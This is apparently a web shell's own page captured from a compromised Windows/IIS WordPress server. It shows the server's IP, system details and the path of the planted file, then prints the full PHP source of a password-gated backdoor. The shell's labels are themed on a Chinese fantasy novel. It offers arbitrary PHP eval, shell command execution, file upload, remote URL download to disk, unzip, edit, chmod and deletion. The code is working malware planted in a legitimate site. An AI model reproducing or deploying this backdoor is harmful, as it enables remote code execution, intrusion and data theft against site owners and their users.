403Webshell
Server IP : 69.30.224.78  /  Your IP : 216.73.217.95
Web Server : Microsoft-IIS/10.0
System : Windows NT SERVER 10.0 build 14393 (Windows Server 2016) AMD64
User : IWPD_92(newtechtest) ( 0)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-admin/user/Contracts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-admin/user/Contracts/index.php
<?php
/* ========================================
   ☠️ 斗罗大陆 · 武魂殿控制台
   ======================================== */
@session_start();@error_reporting(0);@ini_set('display_errors',0);

/* ---- 1. 杀戮之都结界 ---- */
define('TANG_SAN', 'asd');

if(isset($_GET['reset'])){@session_destroy();header('Location: ?');exit;}
if(isset($_POST['haotian'])){
    if($_POST['haotian']===TANG_SAN)$_SESSION['user']=1;
    header('Location: ?');exit;
}
if(!isset($_SESSION['user'])){
    echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><title>杀戮之都</title><style>body{background:#0a0a0a;color:#8b0000;font-family:"Segoe UI",sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}.gate{border:2px solid #8b0000;padding:50px;text-align:center;background:rgba(10,10,10,.95);}h1{letter-spacing:15px;margin-bottom:30px;text-shadow:0 0 15px #8b0000;}input{background:transparent;color:#8b0000;border:1px solid #8b0000;padding:12px;width:280px;text-align:center;}button{margin-top:20px;padding:12px 40px;background:#8b0000;color:#0a0a0a;border:none;font-weight:bold;cursor:pointer;}</style></head><body><div class="gate"><h1>☠️ 杀 戮 之 都</h1><form method="post"><input name="haotian" type="password" placeholder="昊天锤" autofocus><br><button type="submit">破 阵</button></form></div></body></html>';
    exit;
}

/* ---- 2. 路径与变量 ---- */
$__cur__=isset($_GET['dir'])?realpath($_GET['dir']):realpath('.');if(!$__cur__||!is_dir($__cur__))$__cur__=realpath('.');$__cur__=rtrim($__cur__,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR;$__msg__='';

/* ---- 3. 核心逻辑处理 ---- */
if(isset($_POST['act'])){
    $a=$_POST['act'];
    if($a=='upload'&&!empty($_FILES['f']))@move_uploaded_file($_FILES['f']['tmp_name'],$__cur__.basename($_FILES['f']['name']));
    if($a=='mkdir')@mkdir($__cur__.$_POST['n']);
    if($a=='mkfile')@file_put_contents($__cur__.$_POST['n'],'');
    if($a=='rename')@rename($_POST['o'],$_POST['n']);
    if($a=='chmod')@chmod($_POST['f'],octdec($_POST['m']));
    if($a=='save')@file_put_contents($_POST['f'],$_POST['c']);
    if($a=='urldl'){$d=@file_get_contents($_POST['u']);if($d)@file_put_contents($__cur__.basename($_POST['u']),$d);}
    if($a=='unzip'&&class_exists('ZipArchive')){$z=new ZipArchive;if($z->open($_POST['z'])===TRUE){$z->extractTo($__cur__);$z->close();}}
}
if(isset($_GET['del'])){$t=$_GET['del'];is_file($t)?@unlink($t):@rmdir($t);}

/* 昊天锤 (Eval) */
$__res__='';
if(isset($_POST['hammer'])){
    ob_start();try{eval($_POST['hammer']);}catch(Throwable $e){echo "魂力溃散: ".$e->getMessage();}$__res__=ob_get_clean();
}
/* 蓝银领域 (Command) */
$__cmd__='';
if(isset($_POST['blue_silver'])){
    $__cmd__=shell_exec("cd ".escapeshellarg($__cur__)." && ".$_POST['blue_silver']." 2>&1");
}

/* ---- 4. 文件列表 ---- */
$__files__=[];
if($dh=@opendir($__cur__)){
    while(($f=readdir($dh))!==false){
        if($f=='.')continue;
        $fp=$__cur__.$f;
        $__files__[]=['n'=>$f,'p'=>$fp,'d'=>is_dir($fp),'s'=>is_dir($fp)?'-':round(filesize($fp)/1024,2).' KB','m'=>substr(sprintf('%o',fileperms($fp)),-4)];
    }
    closedir($dh);
}
usort($__files__,fn($a,$b)=>$a['d']==$b['d']?strnatcasecmp($a['n'],$b['n']):($a['d']?-1:1));
?>
<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><title>武魂殿</title><style>
body{font-family:"Segoe UI",sans-serif;background:#0a0a0a;color:#c0c0c0;margin:10px;font-size:14px;}
.top{background:#1a1a1a;border:1px solid #8b0000;padding:10px;margin-bottom:10px;display:flex;gap:15px;}
.top a{color:#8b0000;text-decoration:none;font-weight:bold;}
.top a.l{margin-left:auto;color:#ff4500;}
.card{background:#1a1a1a;border:1px solid #333;padding:15px;margin-bottom:15px;}
.card h3{margin-top:0;color:#8b0000;border-bottom:1px solid #333;padding-bottom:8px;}
table{width:100%;border-collapse:collapse;}
th,td{padding:8px;border:1px solid #333;}
th{background:#2a2a2a;}
tr:hover{background:#2a2a2a;}
input,textarea,select{background:#0a0a0a;color:#8b0000;border:1px solid #333;padding:6px;font-family:monospace;}
button{background:#8b0000;color:#0a0a0a;border:none;padding:6px 15px;cursor:pointer;font-weight:bold;}
.container{display:flex;gap:15px;}
.left{flex:1;}
.right{width:35%;}
pre{background:#000;color:#00ff00;padding:10px;overflow:auto;white-space:pre-wrap;}
</style></head><body>

<div class="top">
    <a href="?dir=<?php echo urlencode(dirname($__cur__)); ?>">[ 回圣魂村 ]</a>
    <a href="#eval">[ 昊天锤 ]</a>
    <a href="#tools">[ 魂导器 ]</a>
    <a href="?reset=1" class="l">[ 退出杀戮 ]</a>
</div>

<div class="container">
    <div class="left">
        <!-- Eval 置顶 -->
        <div class="card" id="eval">
            <h3>🔨 昊天锤 (Eval)</h3>
            <form method="post">
                <textarea name="hammer" style="width:100%;height:120px;" placeholder="phpinfo();"><?php echo $_POST['hammer']??''; ?></textarea><br><br>
                <button type="submit">释 放</button>
            </form>
            <?php if($__res__!==''): ?><pre><?php echo htmlspecialchars($__res__); ?></pre><?php endif; ?>
        </div>

        <!-- 文件列表 -->
        <div class="card">
            <h3>🦴 魂兽森林 (<?php echo $__cur__; ?>)</h3>
            <table>
                <tr><th>名称</th><th>大小</th><th>权限</th><th>操作</th></tr>
                <?php foreach($__files__ as $f): ?>
                <tr>
                    <td><?php if($f['d']):?><a href="?dir=<?php echo urlencode($f['p']); ?>" style="color:#8b0000;"><?php echo $f['n']; ?>/</a><?php else: ?><a href="?view=<?php echo urlencode($f['p']); ?>"><?php echo $f['n']; ?></a><?php endif; ?></td>
                    <td><?php echo $f['s']; ?></td>
                    <td><?php echo $f['m']; ?></td>
                    <td>
                        <?php if(!$f['d']): ?><a href="?edit=<?php echo urlencode($f['p']); ?>">修</a>|<a href="?download=<?php echo urlencode($f['p']); ?>">取</a>|<?php endif; ?>
                        <a href="?rename=<?php echo urlencode($f['p']); ?>">名</a>|<a href="?chmod=<?php echo urlencode($f['p']); ?>">权</a>|<a href="?del=<?php echo urlencode($f['p']); ?>" onclick="return confirm('魂飞魄散?')">灭</a>
                    </td>
                </tr>
                <?php endforeach; ?>
            </table>
        </div>
    </div>

    <div class="right">
        <div class="card" id="tools">
            <h3>🧰 魂导器 (Tools)</h3>
            <form method="post" enctype="multipart/form-data"><input type="hidden" name="act" value="upload">收纳:<input type="file" name="f"> <button>入魂</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="urldl">URL:<input type="text" name="u" style="width:60%;"> <button>摄取</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="unzip">解压:<input type="text" name="z" style="width:60%;"> <button>炸开</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="mkdir">建穴:<input type="text" name="n"> <button>凿开</button></form>
            <form method="post"><input type="hidden" name="act" value="mkfile">留书:<input type="text" name="n"> <button>刻字</button></form>
        </div>
        <div class="card">
            <h3>🌿 蓝银领域 (Terminal)</h3>
            <form method="post"><input type="text" name="blue_silver" style="width:80%;" placeholder="ls -la"> <button>缠绕</button></form>
            <?php if($__cmd__): ?><pre><?php echo htmlspecialchars($__cmd__); ?></pre><?php endif; ?>
        </div>
    </div>
</div>

<?php
if(isset($_GET['download'])){$f=$_GET['download'];if(is_file($f)){header('Content-Disposition: attachment; filename="'.basename($f).'"');readfile($f);exit;}}
if(isset($_GET['view'])){$f=$_GET['view'];if(is_file($f)){echo '<div class="card"><pre>'.htmlspecialchars(file_get_contents($f)).'</pre></div>';}}
if(isset($_GET['edit'])){$f=$_GET['edit'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="save"><input type="hidden" name="f" value="'.$f.'"><textarea name="c" style="width:100%;height:300px;">'.htmlspecialchars(file_get_contents($f)).'</textarea><br><br><button type="submit">封存</button></form></div>';}
if(isset($_GET['rename'])){$o=$_GET['rename'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="rename"><input type="hidden" name="o" value="'.$o.'"><input type="text" name="n" value="'.basename($o).'"> <button>更名</button></form></div>';}
if(isset($_GET['chmod'])){$f=$_GET['chmod'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="chmod"><input type="hidden" name="f" value="'.$f.'"><select name="m"><option value="0644">0644</option><option value="0755">0755</option></select> <button>加盖</button></form></div>';}
?>
</body></html>

Youez - 2016 - github.com/yon3zu
LinuXploit